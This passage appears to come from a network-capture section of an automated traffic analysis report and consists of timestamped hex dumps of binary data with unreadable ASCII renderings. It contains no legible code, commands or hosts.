0e 7f a5 f7 8f 37 31 59 e2 87 1d b6 59 2e 1f c6 a2 c6 4f bb 4c 19 aa fa 55 b4 8f 88 7b 4b 67 27 f1 cf 9c ea 15 e9 fe 65 4c ea 49 5b 08 56 88 6d 66 63 73 31 56 f5 66 c4 e2 79 83 d8 2e 32 d9
                                                                                                        Data Ascii: i%HC;^$5m)&]UQg:I:M&Pd^W"ceu.)A?)`k5qF<P'E`epB]sw/}a`(_^<B!\uD9Ze)Eoh71YY.OLU{Kg'eLI[Vmfcs1Vfy.2
                                                                                                        2022-09-29 12:45:44 UTC6726INData Raw: 05 b3 a3 e8 47 e9 a5 ba 6c 31 14 50 b0 0e d8 f6 15 e8 45 e3 00 cf cd 20 65 53 ad 06 c8 79 5e 6b f8 07 49 d7 06 29 2c db 03 78 ab 36 8e 56 9a ab f7 5c 38 cc 82 04 61 9e c0 28 99 6b ed 25 f7 78 8b a7 89 eb 63 29 d0 8c 59 58 f9 cf f6 a2 b5 b0 4b b0 8f b6 af 0e 44 2f d5 13 13 80 a7 b9 92 b9 44 96 8f 1e 53 9d 89 c6 d3 7d f8 63 65 f4 99 d4 48 1b 51 c4 d4 1f d8 c6 98 4d 5f af f5 19 34 33 46 c1 43 ee 3b 3a 2d 10 cd 94 a1 64 f3 ff 2b f5 c5 e3 88 8d 4b 67 c3 52 4a bc 20 8b 6f 3d f7 29 9c 12 06 cd 90 50 d0 37 f8 c9 bb ca 08 e2 04 ab 46 75 f6 86 9c 0d 79 79 7a 8d 4e 27 22 ac cb 9c 47 74 41 f1 8c a0 e2 3a 78 f2 54 a2 1d 52 62 60 0c 31 88 a2 fa 1b eb c5 32 ea 0a 58 5a 27 f6 98 83 3f 65 29 df 27 83 68 5f 9f 12 c8 a8 8b 6c 1d dc fd 6b 1c fe 12 75 6e 2a 24 15 fa b9 d0 0b
                                                                                                        Data Ascii: Gl1PE eSy^kI),x6V\8a(k%xc)YXKD/DS}ceHQM_43FC;:-d+KgRJ o=)P7FuyyzN'"GtA:xTRb`12XZ'?e)'h_lkun*$
                                                                                                        2022-09-29 12:45:44 UTC6742INData Raw: 70 71 8d d0 34 12 f3 cc 35 f6 9f a4 80 dd 5a 55 d4 e0 85 5f c8 3b ce dc 43 f7 83 81 74 ed fd 60 0c dd 1b b2 99 d5 a7 8d da e6 c0 32 38 69 53 70 71 d3 d9 35 15 62 e2 9d a6 8f 1a 5f 31 4b fb cb b6 f7 a0 46 9f 85 d0 d3 9b e5 00 30 2c 35 c5 e1 b3 d2 31 d8 15 e4 e7 32 0d d1 3f e7 42 a0 d1 93 2f a0 58 3a 4e b6 b7 a8 c1 bc 22 e6 21 02 03 70 dd 62 88 37 70 51 6b 66 9c e0 25 a9 70 08 e0 ce cc ee 1c 65 bb b4 21 bc 19 78 76 03 05 3b 2a 4f f5 d8 02 9b 10 86 18 e0 cb 11 aa 29 bd 61 37 d1 2d 0e 02 de fa 14 5a 90 93 75 b1 60 de 18 90 75 97 f4 a4 f8 27 af 61 46 fe 3c 77 e2 f0 63 e1 f9 f3 24 ef a9 95 ff d3 5e 7a 77 21 89 ac 70 5f bf 32 21 7d 2e 9c cb 67 44 32 80 fe 98 2c 1f 01 b4 f5 84 b8 09 70 d4 49 b8 72 fc d7 ea e6 de 83 b2 db 03 aa 7e 4d 71 08 90 02 fe 9f ae a9 31 44
                                                                                                        Data Ascii: pq45ZU_;Ct`28iSpq5b_1KF0,512?B/X:N"!pb7pQkf%pe!xv;*O)a7-Zu`u'aF<wc$^zw!p_2!}.gD2,pIr~Mq1D
                                                                                                        2022-09-29 12:45:44 UTC6758INData Raw: 8b 2d cb 23 50 1b 0f 4c 79 81 2a 8b 20 92 21 d9 ec 7e 98 fa 51 46 27 f2 d4 dd 34 30 02 4d 65 40 4b b3 c1 0e 14 ee f4 2d b7 77 12 34 e3 ca 8f a5 78 7e d0 a6 a8 b4 a4 ed 05 c6 26 aa 5f 8a ff 36 59 95 cb 6f a1 d6 d6 d0 c6 90 1b c0 5e 82 b2 c7 64 c9 6c 7c 58 d5 39 c4 8e 85 db 16 da 0f f7 c1 11 65 44 9c e2 cf 63 84 91 b6 c0 5d a8 d5 02 36 4d 3c 74 90 ac 08 f2 e0 95 ba 05 df ee 75 91 52 a9 47 0c 41 3b 80 71 94 73 fc 1b df 1f 38 e0 38 7f 6f 9b 45 ee 83 62 65 60 10 06 4c 3f 68 a4 ef c7 e3 d9 60 94 81 df 4e 18 6b e2 7e 89 f3 29 4a 50 06 19 47 66 68 c7 72 10 79 df e4 14 08 38 99 1e a7 5d 5e 4f c1 32 4c 31 74 9a 8d 9a 72 6b c2 4d eb 2f 55 83 8f c0 cd 42 ea 61 b5 85 7c fb 4d 65 35 75 5f b8 a1 fb 26 e6 c9 30 41 e1 f1 1d bf 71 d5 76 cb 22 8c 73 23 11 5f e3 22 b5 f2 5b
                                                                                                        Data Ascii: -#PLy* !~QF'40Me@K-w4x~&_6Yo^dl|X9eDc]6M<tuRGA;qs88oEbe`L?h`Nk~)JPGfhry8]^O2L1trkM/UBa|Me5u_&0Aqv"s#_"[
                                                                                                        2022-09-29 12:45:44 UTC6774INData Raw: 13 a8 f9 f4 ff 72 d9 fd e4 cb 38 38 8c c7 2a 9e 5d 6d e3 0c 19 c0 98 98 68 1f 86 8c 50 76 94 bc 1f 75 c3 05 ed 69 ef c8 b4 30 d2 4f 73 ff d4 3d 03 79 31 f1 16 5f af ac f6 53 25 28 26 41 0d 43 3d ac cd fa ae 40 28 89 aa dc 98 b1 52 6b d3 f2 bb d7 0d ef 3d 49 a8 22 ec 74 ba 9a c5 6f b9 05 de 29 8a 9f 3b fa 62 69 74 0f 2c 3a 81 91 cb 84 3d 3e 05 b5 57 b3 70 f0 4b d3 8a 7e 7a d7 ae d2 f5 fe 27 e2 e3 5c 53 17 69 a0 bc 8c bf 61 61 30 04 16 88 6f b9 28 2c 23 c0 ba 95 6d 5a e6 8a d7 d6 cf d3 81 ed 83 05 f7 eb a0 b9 6c df 3e ad 8d 0a ec 38 0e b3 63 a8 90 c1 f9 72 5b ac 22 1b cf c7 ce db 40 b5 e5 09 4e 8d 8a 4c bf cf ca 23 04 05 18 8f 22 7e 99 5b fe 44 de 96 78 dd 7c 8b b3 ee 07 a9 41 ad 67 f0 2b f2 88 1f 7f 78 3f c8 22 2f 44 6b fb f5 d0 cc 6a b6 7a 45 36 d2 10 7b
                                                                                                        Data Ascii: r88*]mhPvui0Os=y1_S%(&AC=@(Rk=I"to);bit,:=>WpK~z'\Siaa0o(,#mZl>8cr["@NL#"~[Dx|Ag+x?"/DkjzE6{
                                                                                                        2022-09-29 12:45:44 UTC6790INData Raw: 24 2e e7 06 65 e0 73 75 2c 3e 06 48 8e dc d3 f2 3a 8a 89 6a bd 48 6c a8 ad 3a 97 d7 33 77 fa 2e d1 66 e6 f0 14 90 1e b1 77 2a 76 07 43 35 84 d6 63 d3 41 33 18 64 24 47 4b 7d 08 82 97 c5 cf 0e 2d f8 16 37 e8 1a 6c b5 82 5b 60 8b 2a f1 67 c2 17 b4 5d e4 08 2c 6f c5 3a f5 b4 4d bd e6 e0 c2 99 10 86 09 ff 4f cd af e3 e2 6b 21 63 f1 cb 38 9d 2a af 5e 27 f6 95 2c 71 0a 61 a2 d6 38 b3 f3 d4 5e 81 8f ca 5a 4b ca d9 4b ee 0e d0 89 fc d7 9f d6 6e c2 a5 80 36 70 be 4e 18 3e af ca a4 ee 21 de 83 42 2b b5 77 11 45 24 fd 65 bd c6 83 fc 77 d5 e2 41 7a d9 4f 19 7b 9a 2d 1e 9e 70 bf 6e 20 24 17 6b 50 a2 1d eb 3a 78 d3 87 d1 5a e8 73 3f d8 7d e5 f7 1f bd 21 5a 83 33 91 5f c7 d2 f6 66 bc 9f 99 d9 94 57 12 92 36 20 6d c3 39 a1 35 d0 d5 02 9b d3 f9 01 04 a2 7f b8 c0 05 83 6f
                                                                                                        Data Ascii: $.esu,>H:jHl:3w.fw*vC5cA3d$GK}-7l[`*g],o:MOk!c8*^',qa8^ZKKn6pN>!B+wE$ewAzO{-pn $kP:xZs?}!Z3_fW6 m95o
                                                                                                        2022-09-29 12:45:44 UTC6806INData Raw: 21 c9 e7 b7 16 ab e5 7e b6 b6 6d 06 9e 25 c5 0a e0 02 7a 1d 2a 4e c5 e5 88 f7 df f9 7d d6 d4 98 c5 e4 64 e4 08 e9 d8 e0 48 09 9d 51 fe 42 04 be f0 6c 82 0f fb a7 2d 43 43 bc 5c f8 d5 7b b2 ac 7d f7 fa 9d 99 1d 34 c9 d2 07 64 39 52 35 8c 60 6a fd ef 87 ea b7 a5 8d 1c 4d ff ff 07 e3 3f 00 3e 8d 49 d6 35 70 1e 17 51 60 1b 1c ec 22 ec cc 14 df 8c 7b f2 3c 5e a5 07 c0 82 53 26 c8 96 d5 cb bf 2b ac 44 85 88 22 37 5d 91 d0 5b 29 1d 5f 69 2f ac da ed 52 ca 2b bf 95 78 2a 9c fc 07 71 ac f7 fd 40 53 1a cf 00 10 1b a4 ef 9f d1 13 72 d8 1a d6 25 0a 4d 82 06 e8 f6 26 ce 47 05 6c 5b 93 62 5e 86 b3 e1 19 0b c6 cd 3a d4 f3 77 bf d7 26 23 b8 1d 57 f6 9d ca b3 6d 6f c1 8d 71 c4 9f 6d 0d b5 5e 40 5e da c9 d9 ae 90 2c 67 72 8a 41 f6 eb e3 49 20 de 09 b2 21 49 c5 98 92 09 23
                                                                                                        Data Ascii: !~m%z*N}dHQBl-CC\{}4d9R5`jM?>I5pQ`"{<^S&+D"7][)_i/R+x*q@Sr%M&Gl[b^:w&#Wmoqm^@^,grAI !I#
                                                                                                        2022-09-29 12:45:44 UTC6822INData Raw: 91 cc fd 04 d8 c7 42 84 d1 35 d7 88 ad bf d0 d2 71 6d 59 4b 26 c0 b6 8f b8 d7 86 52 5f 85 3b 30 55 1b 92 31 39 e2 96 7f 67 86 06 2c 9c 78 fb d4 52 df 45 85 43 9d b1 60 5e 67 98 45 f7 af 26 90 bb 69 1d 95 26 51 9f 7e df b7 72 be 46 af 62 e3 a0 b6 87 f3 8d 91 7e fb 93 54 b2 7e 52 2d d9 41 89 ae ad a7 9d 5c f1 29 e2 53 a4 a4 3a 6d 33 02 e3 7e ae 30 66 52 72 04 9e 67 a6 31 6a f4 2d 60 94 0f cc 0c c0 ac 35 47 97 09 8a bf 82 92 e1 45 52 02 78 e5 c0 9e 7a f5 29 33 2b b8 38 dd fe fe 07 16 a5 de 67 88 b1 80 09 eb d4 c2 57 a9 a0 2b c2 95 7b e5 f4 a4 50 2c 80 2b 23 00 6f 82 7d eb 7f 3a 44 f5 c0 80 dd a6 07 71 a2 c5 a9 d2 18 c0 fd 09 99 cf 90 26 ed a2 0b a4 0a ac cf fc 28 61 03 12 60 ba 55 83 9c 82 61 14 f7 a3 9b 0d 42 0c e6 5e 8b 3f 8f 18 19 ad 9a a0 16 92 39 41 cc
                                                                                                        Data Ascii: B5qmYK&R_;0U19g,xREC`^gE&i&Q~rFb~T~R-A\)S:m3~0fRrg1j-`5GERxz)3+8gW+{P,+#o}:Dq&(a`UaB^?9A
                                                                                                        2022-09-29 12:45:44 UTC6838INData Raw: a3 d7 93 b1 79 51 fd 27 d1 2d bd de 98 ae 5e 5e 15 65 80 dd 05 8b d1 02 40 87 bb dc b3 9a d1 ac 57 ee 67 dc f6 cb 40 cb f2 28 b2 5e 97 db ae ae 76 10 cf 59 72 3a dc 37 ab 28 02 0f 55 8f ef 2e b6 cc 71 79 64 1e 83 4b fc be 6e bf 5b 4a ff 2e 21 e3 ba 7a bf d5 19 f8 08 29 58 5a 75 bf 85 0c 55 ab 1a dc dd 5a 22 c5 b1 88 c4 fe 88 9e c2 74 d1 76 f3 ee 4f 31 14 03 e1 a7 7e dc be 80 f8 26 89 91 f3 58 4d 58 4c 7f 84 cf c0 23 17 f7 12 1a 76 03 98 43 d7 39 4e ec 5e 43 22 49 15 79 0a 73 43 ca 53 fa b5 53 88 1c 8a 9b e3 62 81 ee a4 40 d5 2d e1 37 e1 94 ab d9 31 2e e1 aa 04 67 54 73 79 1d 06 52 8d db 2a 50 09 10 26 d7 d9 a4 92 ef 70 22 23 10 30 ba de 72 24 59 06 66 ca a0 3c cf 3a 93 56 54 83 3e 92 24 bc 74 d8 ea 4e b3 31 fe cc dd 30 ca cd 59 ba 98 a9 6d e4 3e 73 72 e2
                                                                                                        Data Ascii: yQ'-^^e@Wg@(^vYr:7(U.qydKn[J.!z)XZuUZ"tvO1~&XMXL#vC9N^C"IysCSSb@-71.gTsyR*P&p"#0r$Yf<:VT>$tN10Ym>sr
                                                                                                        2022-09-29 12:45:44 UTC6854INData Raw: 34 4d 83 a8 8d b9 7f 1c e6 46 23 53 f2 50 b8 9e 6a d0 50 72 31 a9 84 98 75 0a 36 c0 ff 8f d9 bc ee ff 7d a6 27 5f 7f e7 61 b4 eb e3 72 04 0c b0 ac 46 8d ee d3 bd 9b ee 3d 95 ed a6 bf 78 1e 5e 26 5c 13 f2 38 32 e3 e6 db 64 99 5a 4e f1 b4 c6 ff b7 11 fd d4 d2 1f 0a 38 90 da 47 c5 33 21 80 ff 26 23 c4 b0 f2 57 4e 5a e0 e4 14 f9 54 5f 41 ff 2e 1b 98 22 3c c8 18 cf a4 75 07 29 81 53 0b fe dd 84 e8 7f 48 19 eb 8a ea 04 84 9e 6e 96 0a 8f aa e1 e1 fd d6 c2 ab e2 5a 0b 17 ba 4f 61 54 78 07 7c 88 c8 5f 7c f6 46 ce 99 e1 51 1e e3 f1 ce de 3a ab af a1 14 9a 1a 48 e1 4b 3b 54 68 a7 38 b7 e3 5d 6c 5d 8d 52 25 4c a4 bc 4e 78 fa e9 72 19 fa ae ab 41 24 c3 71 b2 15 fd 96 ae 47 9c 2d 16 0a 7d 10 e3 48 82 b0 15 27 95 af 9b f2 4c 2a 3b 27 63 f5 e9 b0 ef d2 b6 81 9d 6d 7b be
                                                                                                        Data Ascii: 4MF#SPjPr1u6}'_arF=x^&\82dZN8G3!&#WNZT_A."<u)SHnZOaTx|_|FQ:HK;Th8]l]R%LNxrA$qG-}H'L*;'cm{
                                                                                                        2022-09-29 12:45:44 UTC6870INData Raw: 22 a0 37 d9 5f ee b4 29 d5 b1 79 35 22 c3 26 e0 20 c0 74 82 fb d9 81 07 ff 0b 58 53 58 b8 48 f9 97 08 74 c1 bb 0e fa 29 f9 cb 2d 52 3b ef f2 08 87 9e 14 b4 00 cc e5 0b 2f d9 55 04 97 74 4c 64 17 45 fe d5 59 a4 19 e1 9b 04 d6 f4 fe 18 7a 22 31 13 69 8a de 5d 6e 86 2b 40 ff 7d 69 5d 56 d0 82 50 f5 22 12 cd 34 78 15 b5 cd 36 6a 5c 5c 66 b0 cb 0c 25 3a 23 0a a5 4e 6c e2 b5 d6 2b 63 f8 cb 25 df 3c 46 ed 48 93 5a c0 15 47 94 5f 3d f1 57 f6 c2 54 5c 19 cf 41 94 84 39 25 34 52 3a aa c5 5d be 76 cb 4e 69 f4 1f 0f bb a0 6c d9 94 24 d0 f8 f4 3d 6b 5b ef be 57 90 60 ff 35 a9 90 fa 6d e4 ab 6c 38 18 45 2b 14 ca ee 74 ec 28 62 01 44 22 19 39 19 88 28 b7 c4 d1 70 1c f4 d6 10 2d 8a 19 48 fa 56 16 cc c5 16 c0 45 d9 da 8e 06 51 97 e6 7c aa 17 a1 81 c1 36 0b b0 f7 06 71 cc
                                                                                                        Data Ascii: "7_)y5"& tXSXHt)-R;/UtLdEYz"1i]n+@}i]VP"4x6j\\f%:#Nl+c%<FHZG_=WT\A9%4R:]vNil$=k[W`5ml8E+t(bD"9(p-HVEQ|6q
                                                                                                        2022-09-29 12:45:44 UTC6886INData Raw: d7 d9 13 81 4b 36 5e 0a fa 8a b6 f3 5f 13 8c 8e 16 4a 6a a7 d6 1e 00 50 41 3c 13 b9 71 37 a7 93 55 db f2 91 2d c0 6f 4a 91 9c fc 83 70 cf 4a 45 2c 37 cc 18 75 85 10 08 83 2e 89 67 48 56 aa a0 ea eb b2 83 ca 07 b8 72 34 22 71 3c 71 32 6d 65 0c 81 db ac 7b 2c 70 ab 09 80 86 27 17 42 42 35 fb 4c 4f 64 ec 1e 1c 05 3f 6a 3f 47 60 c7 1e a3 b0 14 83 d3 b3 5c ab cc 22 15 7c 68 e4 b5 67 a6 e5 67 da cc 2a 0f 15 ce 81 d8 b0 2f f0 4c 6b f1 86 06 5e 56 b8 8e e0 4c ce 4e 32 f0 4b 78 2f 22 d9 8b d1 b6 bc 57 40 03 94 73 33 d8 97 71 7c 86 c2 f8 d6 09 c2 f8 78 63 fe 0b 60 5e df 94 20 2b f2 1f 38 93 54 25 9d 1b f2 8b 43 4f db a1 10 c8 34 43 27 3d 2d b1 b2 bf 3e 1a f7 73 e1 18 be 44 30 6d 25 36 9c c4 f7 21 d3 0c 54 77 b2 a7 f0 23 45 fa 15 68 76 c5 29 36 0e b2 b4 0e a6 7e 86
                                                                                                        Data Ascii: K6^_JjPA<q7U-oJpJE,7u.gHVr4"q<q2me{,p'BB5LOd?j?G`\"|hgg*/Lk^VLN2Kx/"W@s3q|xc`^ +8T%CO4C'=->sD0m%6!Tw#Ehv)6~
                                                                                                        2022-09-29 12:45:44 UTC6902INData Raw: d7 be 6b 06 52 86 62 01 56 24 fe 56 fc 43 78 8b 73 62 e2 a7 0f c4 4c cc 0a c7 77 43 f2 34 16 e2 80 2c 0f 44 dd 74 1e 09 52 f1 56 bd 88 28 36 33 3b a4 75 8d cb e4 fa 7b fb 5e e7 bc 24 dd 2f f2 4f 35 59 4d 65 09 52 85 0d e2 4e 74 f6 50 2f c9 37 e6 d6 ee f5 d5 e3 32 69 dd d6 05 fc 14 e8 4c a7 4d 1d 00 76 ac 1d 10 d3 20 e2 d5 6b 34 09 91 a7 46 fe be 45 07 fc c2 d6 b3 39 cf f8 f1 9c 66 f6 58 eb 2e 0f a9 ae 89 35 af ab e6 0f 69 5e 38 0f 30 53 c1 6d 7c 08 1d 9c 8c c7 9b 17 5b 0b a4 0b a7 57 34 4d 03 c8 59 17 c4 ad db 54 b8 6d b6 29 c1 9f bf dc f8 9d 81 35 7f ac 31 82 b8 03 49 8e 14 58 aa 5e 7d ac 9a d2 7d 43 72 f6 63 d9 80 7d dc 3e ba be 03 ed 53 79 2a 61 28 36 33 84 be d0 c1 63 6d 40 e3 11 41 92 f0 57 93 5f 52 bb d8 f7 6e a6 14 88 dd 3b ab 99 5f 57 76 30 92 6b
                                                                                                        Data Ascii: kRbV$VCxsbLwC4,DtRV(63;u{^$/O5YMeRNtP/72iLMv k4FE9fX.5i^80Sm|[W4MYTm)51IX^}}Crc}>Sy*a(63cm@AW_Rn;_Wv0k
                                                                                                        2022-09-29 12:45:44 UTC6918INData Raw: e7 48 64 2d 98 a6 b8 6b 31 aa 35 13 48 76 45 93 7d 47 f9 fb fc 4f 21 de 1f c1 00 44 54 71 81 71 01 52 c4 7b bb db 6d 9d 02 5b 27 85 bf e0 0c 2d 16 17 f8 1f 8e 6c 32 be 83 c5 4d d2 6f 96 20 b4 3b a1 23 77 60 73 9b 44 35 1d 81 90 3c 83 ec f7 98 b1 39 1d 9a 0a a7 95 7b ec fc 6b eb 25 94 06 bf f0 94 6e 45 2e fa 96 9d 53 ee 2b 05 09 77 02 ff 32 84 cd 80 d3 20 8d ad af 8b 0a 4e 75 17 88 e5 e6 34 4f 5e 8f 54 3f 4f a2 5e a6 70 c5 e1 26 b6 1a 35 37 b2 07 58 76 ac 8d 47 19 d2 64 66 67 40 6e a3 6f 49 be bf 1e 69 f3 87 a2 73 e5 29 00 c9 5b 76 fa b4 e8 7d 00 29 d3 42 9d 21 d2 a2 5e 01 a7 87 fe 7d 21 8d 7f 4e fd de 05 55 af 2e 12 47 39 b3 59 88 90 48 67 11 ac ef d5 98 15 a6 4c 4f 66 d0 a0 2e f5 a9 88 40 92 b3 32 2b 25 4e 5f e2 71 fa 0c 10 d8 59 15 ca 0c 78 e1 05 53 53
                                                                                                        Data Ascii: Hd-k15HvE}GO!DTqqR{m['-l2Mo ;#w`sD5<9{k%nE.S+w2 Nu4O^T?O^p&57XvGdfg@noIis)[v})B!^}!NU.G9YHgLOf.@2+%N_qYxSS
                                                                                                        2022-09-29 12:45:44 UTC6934INData Raw: 4c 0a c0 b2 b1 15 ec e4 3f 71 14 cd 6a e8 c2 1e 15 61 2a 67 a5 da 97 09 85 a2 29 45 b0 96 29 7b 86 ba d7 07 d0 b6 17 90 a2 d3 e4 5b b1 68 20 66 ae f1 e4 5e cc c9 50 ad d0 a5 cf 73 7f a6 09 85 7c 3f 15 c4 50 65 31 a0 00 3b 96 0f b4 26 ac 94 a2 dd cf 6c ee 05 3c 2e 63 6e 4a ff b2 db dc 1e 59 34 4a 50 44 1f 4b 27 0d f9 86 1a 5a 2d cc 40 6d ad 5a 43 87 09 31 8d aa 02 75 1e bd c0 3c 1f 6e e5 14 88 ec 72 02 96 7f d0 00 43 d9 60 db 6b 44 bc 88 38 81 51 fa 89 f0 56 5f 7f 35 a5 60 30 07 66 6d ec c9 31 e8 f6 a8 dd 5d 90 d9 2b 4e 5d 71 c6 fb f7 fa ab 03 7b 34 f3 47 d8 27 af cc e2 9a 35 7c 83 21 5f e5 c1 19 31 ac fd 0a 55 14 52 7b b2 39 c4 1d a5 8f 3f f0 67 f3 a0 2b cd cd bf 60 cf 44 c4 6d 6b d3 3f a8 fe 7a 14 a8 8c dc 69 5d 75 64 51 4f df 94 81 fc 89 e3 a2 bd 06 ee
                                                                                                        Data Ascii: L?qja*g)E){[h f^Ps|?Pe1;&l<.cnJY4JPDK'Z-@mZC1u<nrC`kD8QV_5`0fm1]+N]q{4G'5|!_1UR{9?g+`Dmk?zi]udQO
                                                                                                        2022-09-29 12:45:44 UTC6950INData Raw: 82 25 1b b0 81 6d 54 47 35 26 fe 96 f8 6e ca f2 48 42 a1 95 96 3e d7 42 e9 5e 65 4d 9c 05 72 82 f6 83 e2 0c a9 89 d7 23 77 40 e9 ca c3 ef 93 b8 fc 23 39 20 fe 05 65 c3 de 82 e0 b4 34 01 d0 1a 07 20 3e 7e 97 e4 77 c5 8e 30 f8 33 52 5e 7d 42 c3 eb 84 35 8e 1d 99 2d 77 f8 b9 af 07 6d c5 c2 7f fd de ad 6b 35 4e e1 e7 fc d0 4b 45 80 64 e9 c3 a8 91 a9 37 99 db c1 92 25 4d 3c e6 4e 3a 59 16 a8 26 c7 96 eb b8 98 78 e9 95 75 36 ca af 31 e2 ce d5 c2 bd aa 9e 00 6c 1f b4 bb df ba d1 a4 67 17 f9 90 60 1f 9c df 3f 54 e2 f2 34 89 1d 54 f0 57 d0 ff 1d 7f 0a e3 7f b6 57 2f e3 40 ea a7 61 80 64 3b 52 28 5c d2 d7 7c 3d e6 5c 8d a7 ad 3a c1 da c3 f0 5b 09 7a 11 67 86 e8 f9 a7 66 18 1d 62 56 41 2b dd 66 98 d8 d0 ef 26 9e fc 72 f9 5e 0c a4 6d 03 9a 6a 60 da b4 fa 0f 8e 66 05
                                                                                                        Data Ascii: %mTG5&nHB>B^eMr#w@#9 e4 >~w03R^}B5-wmk5NKEd7%M<N:Y&xu61lg`?T4TWW/@ad;R(\|=\:[zgfbVA+f&r^mj`f
                                                                                                        2022-09-29 12:45:44 UTC6966INData Raw: 35 f1 9a 4b ae 6a f3 8a 65 b5 e1 54 fd 33 2a 8e fc 13 69 89 5b 61 30 85 52 c2 8c 2c a4 30 d1 79 66 d6 e2 48 63 14 c0 70 4e 17 89 76 a7 a1 47 ca 68 df f1 4b 13 ed 68 f7 d8 51 e1 b2 37 3a d5 64 08 6a 24 8c 6f 5c bd 1d 5e ac a7 ef b1 99 21 9b 7c 14 38 67 ed 9b 2c ce 8e 08 31 0f 33 0c f8 f8 fa ae 56 58 04 0e 4b 11 88 ff c3 b3 28 0c 06 55 d5 58 59 10 a5 2f ca 70 20 88 ac e8 9b 52 3a f5 d1 96 79 86 27 69 c0 79 e3 c1 c6 c4 d8 6b 28 c2 9d c4 41 76 0f 8e 8f 74 49 9d e3 d6 a8 23 5b b9 ec a0 46 2d 97 ba 6c a0 75 c2 d6 f6 e8 13 8f e4 78 73 27 74 7a 14 c8 d9 a4 5a 8b cc 9f 38 66 6b 52 95 1b 64 19 2c c9 c5 ce 50 a1 d7 ee 2b 2e 2b e5 59 e9 2e 43 f8 91 6f 44 d0 8a da a9 5f 60 33 b3 32 42 05 e1 7a 56 d1 40 b7 c4 6d 46 97 3e 0b f7 71 12 ab 3b e5 8b 7f 4c ad 80 d5 c6 3c d2
                                                                                                        Data Ascii: 5KjeT3*i[a0R,0yfHcpNvGhKhQ7:dj$o\^!|8g,13VXK(UXY/p R:y'iyk(AvtI#[F-luxs'tzZ8fkRd,P+.+Y.CoD_`32BzV@mF>q;L<
                                                                                                        2022-09-29 12:45:44 UTC6978INData Raw: a3 28 d8 83 3a 5d c6 c8 c8 63 36 a7 c3 57 1c d3 f8 f2 05 0e 03 e7 f2 f9 f0 fe ce f3 05 db f4 db 58 60 dd 69 63 f0 d1 ee fd bb ae 46 b2 a2 44 5b 39 f0 d5 38 27 f4 b5 f2 65 4b 8e 18 10 62 b5 00 8e 16 e5 7f 28 7a 3b a2 4b 12 d9 00 2b 44 42 98 c2 dc 2f 6b 59 cc 99 54 1c 0f 86 10 33 01 2b e0 8b af 48 0e 9e 3d 0e 6d 03 d0 1a 8a bb 51 d6 22 3e 52 dc 78 7d c1 f2 d7 3d ac 28 a3 78 1c 8b a7 67 f1 1f 11 65 60 f3 3b c7 fc 34 77 01 dd b9 6c 42 16 d5 22 ad 84 83 a6 53 d6 d9 f3 72 8d 7e bd 4f a4 a8 21 f8 99 c3 f8 91 53 72 3b 98 33 71 29 93 4d 10 fe c1 46 0c 82 58 ec 0e de 11 64 13 91 f4 38 01 f7 c4 e1 12 84 a6 a5 72 4f 4d 3a e4 52 82 61 0c 0b dc 07 51 71 16 e5 e2 15 cd 8a 91 9c db b4 d7 9b dd 88 54 b2 e3 ed 03 e0 6b 2e 13 ca a1 5f a3 c8 d7 3c 84 1e 86 a7 7d 26 66 6c a9
                                                                                                        Data Ascii: (:]c6WX`icFD[98'eKb(z;K+DB/kYT3+H=mQ">Rx}=(xge`;4wlB"Sr~O!Sr;3q)MFXd8rOM:RaQqTk._<}&fl
                                                                                                        2022-09-29 12:45:44 UTC6994INData Raw: e4 f3 6f e9 f3 07 b5 d4 3c 2e 6d f6 52 ad 77 54 95 f4 aa c6 6d 89 b0 f0 e9 91 eb 3c 53 b5 ab 43 76 98 41 8b 69 f8 3d 08 87 7f 03 ee ca dc 63 a5 9e 43 c8 6f 87 ec ed f9 03 86 c8 90 a0 4b d1 20 2b d3 79 f9 66 78 e1 d8 9e 60 26 48 d9 3a f7 f4 87 65 04 66 76 11 1a d7 84 9e 76 0c fe 3f 3f a7 af b4 bf e0 21 cf fb 2c 7a 50 c6 9d 66 08 94 08 ce bd 9d 3f 33 66 ad 91 b6 ff 18 22 70 4a d5 e0 2c b9 fc 57 91 84 a0 12 ff 64 6b a0 16 09 58 3a 66 8f 85 84 19 db 2b b4 bb 38 49 6d 9e 7f 3a 16 a9 41 93 ca 56 a5 04 51 c8 85 aa c2 c4 21 cd f8 05 e6 66 13 9d 38 64 b8 da 2f b6 be e6 38 8f 72 10 62 d5 01 12 e6 d6 16 86 6f ef d6 8f e7 06 28 6c ca 4d 4a 0b 28 c5 83 62 2b 49 a8 38 60 fb 8f b5 b8 5a d8 61 bf 5f f6 86 de 3a 4b 2e 01 26 a6 86 a5 85 84 1b 39 85 34 db 1f 4e 6f f4 cc 3c
                                                                                                        Data Ascii: o<.mRwTm<SCvAi=cCoK +yfx`&H:efvv??!,zPf?3f"pJ,WdkX:f+8Im:AVQ!f8d/8rbo(lMJ(b+I8`Za_:K.&94No<
                                                                                                        2022-09-29 12:45:44 UTC7010INData Raw: 86 c2 31 04 57 0f 54 36 39 72 9d 85 e9 9b 4c f5 44 11 fb 61 6c 4e 60 4d dc 5a 81 32 03 e7 7a 5f 93 bf 86 26 a8 7d 82 5e ba fa b6 da be ff e5 08 7c ae 2a c3 30 62 aa 61 1d 06 8d a1 14 26 56 8b a7 e6 7f 75 03 63 ba 3f 2a 67 5c a7 61 eb 72 b7 aa c6 ba 4c d6 55 d4 80 cc 0e 7d 1a 3c 40 9b b9 2a cb ca b2 c0 fa 3f 5d 3a 91 30 94 25 33 ce 96 80 c2 db 12 68 30 12 81 51 7b 98 aa 42 74 d7 46 c2 3a bc 03 90 24 c5 e2 f7 61 b7 1a 7c 71 68 82 ae 33 85 d0 98 70 92 ab 7c e6 7b e2 3a 97 f4 cc f5 88 7f e2 ae bb d6 83 10 bf 53 68 db 8c 9f 6c e1 b0 c3 c0 e5 35 3f da 96 9e 7c 95 bf 0b 1a 15 51 55 48 d9 5a 4c c8 40 e6 45 09 b5 b5 74 c7 93 54 0a a2 e5 17 f2 b4 92 0b d7 e6 8c d1 e7 1f e0 1b 52 98 fe 01 09 41 c7 8f 96 86 9b 56 2a 39 09 60 fa 63 92 b5 c5 57 44 ae ff 21 48 a2 0b 59
                                                                                                        Data Ascii: 1WT69rLDalN`MZ2z_&}^|*0ba&Vuc?*g\arLU}<@*?]:0%3h0Q{BtF:$a|qh3p|{:Shl5?|QUHZL@EtTRAV*9`cWD!HY
